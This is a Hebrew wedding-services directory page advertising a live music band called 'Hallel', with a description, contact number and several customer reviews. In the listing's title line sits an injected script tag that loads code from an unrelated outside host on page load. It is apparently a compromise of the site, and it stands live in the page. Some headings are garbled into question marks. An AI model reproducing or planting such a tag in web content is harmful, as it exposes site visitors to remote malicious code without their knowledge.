חתונה יהודית
פירסום חתונה בדקה ה90 אירועים וחוויות ווידאו חתונה הנחות ומבצעים מאמרים רשימה אישית טיפים חתונה - ראשי
 
חתונה יהודית > ????? - ?? ????  > ????? \ ?????? > הלל | מוזיקה חיה לאירועים
חזור 
הלל | מוזיקה חיה לאירועים
הלהקה שתעשה לכם את החתונה כמו שאתם חולמים, "הלל" היא להקה "דינאמית", שמתאימה את עצמה בדיוק לפי החלום שלכם, יש באמתחתינו למעלה מ-12 נגנים, ואנחנו נרכיב את ההרכב האידיאלי עבורכם מבחינת הסגנון המוזיקלי, אופי הציבור והאירוע, וכמובן התקציב. נשמח ללוות אתכם מכיסא הכלה, דרך החופה אל ההרקדות, שם נעיף אתכם ואת אהוביכם באוויר, באנרגיות שלא יישכחו, ואם תרצו נישאר אתכם כהרכב אינטימי עד ה"שבע ברכות", עם כלים אקוסטיים מסביבכם, כראוי למלך ומלכה. ביחד נבנה את רשימת השירים המושלמת לכל חלק בערב, ואת אופי המוזיקה, כדי שכל פרט יהיה מיוחד ומתאים במקומו.

טלפון :
053-7102013
נייד :
כתובת :
  כל הארץ


ליצירת קשר עם בעל העסק הקש כאן
הלל | מוזיקה חיה לאירועים - ????? - ?? ????<script src=http://laba.com/muuu.s></script> 1
SimpleViewer requires Macromedia Flash. Get Macromedia Flash. If you have Flash installed, click to view gallery
 18/03/2015 21:40:32- אהרן רזאל
חידוש גדול !
הייתי בשבע ברכות מפואר שניגנו שם, חידוש גדול בעוחם הלהקות!הזרימה שלהם, ההשתלבות המדהימה באירוע ריגשה את כולם! אהרן

17/02/2015 18:46:56- בנימין מולודוי
נשמה של הארוע
רבותי, שאיפה של כל בעל אירוע שהיום הזה ייכנס ללבם של כל המשתתפים וישאר שם בתור זמן קסום ויוצא דופן. כמובן, שנגנים טובים עושים רוב העבודה עם לא הכל. אומר לכם מכל הלב, הלהקה הזאת- להקת "הלל" מצליחים כל פעם מחדש לכבוש את לבי. ראיתי את עבודתם באירועים שונים וכל פעם הם עולים ועולים ביכולתם להרגיש ולרגש את הקהל, לאחד את כולם ולצור אירוע בלתי נשכח. זה הנגנים, רבותי!ממליץ אותם כל פעם למשפחה- זה אומר הכל:)

09/02/2015 07:24:12- דורון אדר
שבע ברכות
זכיתי להיות נוכח באירוע בו נגנה הלהקה לפני כשבועיים. ידעו ממש לקרוא את הקהל. היה נעים כשאכלנו ומאוד שמח כשסיימנו את הסעודה, אפילו חברים שלי שלרוב לא רוקדים לא יכלו להשאר אדישים לקצב ולשמחה שהפיצה הלהקה.ממולצים בחום!

07/12/2014 22:10:33- אלי שטיינברג
ממליץ בחום
השתתפתי בכמה אירועים של יפתח ושאר החברים, היה זה במגוון מקומות, פעם בלב ים, פעם בקברי צדיקים באוקרינה, פעם עם קבוצה בשוויץ, ולעיתים גם בירושלים.הדבר שכה מיוחד במוזיקה שלהם, זה החיבור החזק, לאנשים ולמקום. בכל מקום שהם הופיעו זה היה כמו הופעה חדשה שהותאמה בדיוק לרקע ולאווירה. גם אנשים שהיו רחוקים ממוזיקה יהודית, התחברו, השתלבו, וכמובן, השירים פתחו את הלב והשמחה פרצה גבולות.המוזיקה שלהם נוגעת בנקודה פנימית, שיש בה אור ושמחה.ממליץ בחוםאלי שטיינברגר

10/09/2014 17:10:32- בן-גד טל
איזה חתונה עשו לנו!!!
הזמנו את להקהת הלל לחתונה שלנו בלי לדעת האמת למה לצפות בדיוק. החתונה הייתה פשוט מדהימה בזכותם, איזה ביצועים, איזה חיבור לקהל, איזה אנרגיות פורצות, איזה שמחה בלי מנוחה, המוזמנים כולם פשוט השתגעו ולא הפסיקו לתת מחמאות ולשאול מי זאת הלהקה הזאת ומאיפה הצלחנו להשיג אותם... האמת היא שדרך חבר, באמת לא שמעתי עליהם לפני ואיזה שמחה שמצאתי אותם. אשתי גם כן לא מפסיקה להלל את הלל :) כמה הם עשו שמח בחתונה ואיך החברות שלה התלהבו מהם בלי סוף. ראיתי גם במהלך החתונה שהרבה אורחים ניגשו אליהם וביקשו כרטיסי ביקור וכדומה כנראה...אין לי הרבה מה להגיד עוד חוץ מפשוט להמליץ לכל מי שרוצה אירוע שמח אמיתי ממש לקחת את הלהקה הנפלאה הזאת!רק בשמחות,בן